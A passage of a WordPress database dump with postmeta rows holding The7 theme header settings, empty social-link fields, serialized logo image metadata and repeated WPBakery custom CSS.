(31889,4083,'_dt_fancy_header_responsive_height','70'),
(31890,4083,'_dt_fancy_header_responsive_font_size','30'),
(31891,4083,'_dt_fancy_header_responsive_title_line_height','38'),
(31892,4083,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31893,4083,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31894,4083,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31895,4083,'_dt_teammate_options_go_to_single','1'),
(31896,4083,'_dt_teammate_options_position',''),
(31897,4083,'_dt_teammate_options_website',''),
(31898,4083,'_dt_teammate_options_mail',''),
(31899,4083,'_dt_teammate_options_facebook',''),
(31900,4083,'_dt_teammate_options_twitter',''),
(31901,4083,'_dt_teammate_options_dribbble',''),
(31902,4083,'_dt_teammate_options_you-tube',''),
(31903,4083,'_dt_teammate_options_rss',''),
(31904,4083,'_dt_teammate_options_delicious',''),
(31905,4083,'_dt_teammate_options_flickr',''),
(31906,4083,'_dt_teammate_options_lastfm',''),
(31907,4083,'_dt_teammate_options_linkedin',''),
(31908,4083,'_dt_teammate_options_vimeo',''),
(31909,4083,'_dt_teammate_options_tumbler',''),
(31910,4083,'_dt_teammate_options_pinterest',''),
(31911,4083,'_dt_teammate_options_devian',''),
(31912,4083,'_dt_teammate_options_skype',''),
(31913,4083,'_dt_teammate_options_github',''),
(31914,4083,'_dt_teammate_options_instagram',''),
(31915,4083,'_dt_teammate_options_stumbleupon',''),
(31916,4083,'_dt_teammate_options_behance',''),
(31917,4083,'_dt_teammate_options_px-500',''),
(31918,4083,'_dt_teammate_options_tripedvisor',''),
(31919,4083,'_dt_teammate_options_vk',''),
(31920,4083,'_dt_teammate_options_foursquare',''),
(31921,4083,'_dt_teammate_options_xing',''),
(31922,4083,'_dt_teammate_options_weibo',''),
(31923,4083,'_dt_teammate_options_odnoklassniki',''),
(31924,4083,'_dt_teammate_options_research-gate',''),
(31925,4083,'_dt_teammate_options_yelp',''),
(31926,4083,'_dt_teammate_options_blogger',''),
(31927,4083,'_dt_teammate_options_soundcloud',''),
(31928,4083,'_dt_teammate_options_viber',''),
(31929,4083,'_dt_teammate_options_whatsapp',''),
(31930,4083,'_dt_teammate_options_reddit',''),
(31931,4083,'_dt_teammate_options_snapchat',''),
(31932,4083,'_dt_teammate_options_telegram',''),
(31933,4083,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31934,4088,'_wp_attached_file','2023/04/logo_en_tasa.png'),
(31935,4088,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:65;s:4:\"file\";s:24:\"2023/04/logo_en_tasa.png\";s:8:\"filesize\";i:10681;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"logo_en_tasa-150x65.png\";s:5:\"width\";i:150;s:6:\"height\";i:65;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3310;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31936,4089,'_wp_attached_file','2023/04/logo_en_tasa2.png'),
(31937,4089,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:313;s:6:\"height\";i:66;s:4:\"file\";s:25:\"2023/04/logo_en_tasa2.png\";s:8:\"filesize\";i:19178;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"logo_en_tasa2-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26776;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"logo_en_tasa2-150x66.png\";s:5:\"width\";i:150;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11198;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(32581,4482,'_wp_attached_file','2023/05/LOGO_CORP_HORIZONTAL_LIGHT.png'),
(32582,4482,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:995;s:6:\"height\";i:303;s:4:\"file\";s:38:\"2023/05/LOGO_CORP_HORIZONTAL_LIGHT.png\";s:8:\"filesize\";i:18746;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\";s:5:\"width\";i:300;s:6:\"height\";i:91;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6238;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LOGO_CORP_HORIZONTAL_LIGHT-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4146;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LOGO_CORP_HORIZONTAL_LIGHT-768x234.png\";s:5:\"width\";i:768;s:6:\"height\";i:234;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26513;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:38:\"LOGO_CORP_HORIZONTAL_LIGHT-500x152.png\";s:5:\"width\";i:500;s:6:\"height\";i:152;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13754;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:38:\"LOGO_CORP_HORIZONTAL_LIGHT-800x244.png\";s:5:\"width\";i:800;s:6:\"height\";i:244;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28687;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(32583,4494,'_wp_attached_file','2023/05/image005.png'),
(32584,4494,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:144;s:6:\"height\";i:50;s:4:\"file\";s:20:\"2023/05/image005.png\";s:8:\"filesize\";i:7885;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(32585,4495,'_wp_attached_file','2023/05/egyptair-e1690251327743.png'),
(32586,4495,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:714;s:6:\"height\";i:398;s:4:\"file\";s:35:\"2023/05/egyptair-e1690251327743.png\";s:8:\"filesize\";i:40018;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"egyptair-e1690251327743-300x167.png\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31243;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"egyptair-e1690251327743-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19422;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:35:\"egyptair-e1690251327743-500x279.png\";s:5:\"width\";i:500;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(32591,4500,'_wp_attached_file','2023/05/HEXAGON_STANDARD_CMYK_LOGO.jpg'),
(32592,4500,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1380;s:6:\"height\";i:572;s:4:\"file\";s:38:\"2023/05/HEXAGON_STANDARD_CMYK_LOGO.jpg\";s:8:\"filesize\";i:160956;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:124;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5354;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"HEXAGON_STANDARD_CMYK_LOGO-1024x424.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23779;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"HEXAGON_STANDARD_CMYK_LOGO-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3309;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"HEXAGON_STANDARD_CMYK_LOGO-768x318.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:318;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16889;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:38:\"HEXAGON_STANDARD_CMYK_LOGO-500x207.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9936;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:38:\"HEXAGON_STANDARD_CMYK_LOGO-800x332.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:332;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17628;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:39:\"HEXAGON_STANDARD_CMYK_LOGO-1280x531.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31190;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:5:\"Print\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(32596,4515,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1684297727133{margin-top: 25px !important;}.vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(32597,4516,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1684297727133{margin-top: 25px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(32598,4517,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1684297727133{margin-top: 25px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(32599,4518,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1684297727133{margin-top: 25px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}'),
(32600,4520,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684297727133{margin-top: 25px !important;}.vc_custom_1684201412150{margin-top: 100px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684272005765{margin-top: -25px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
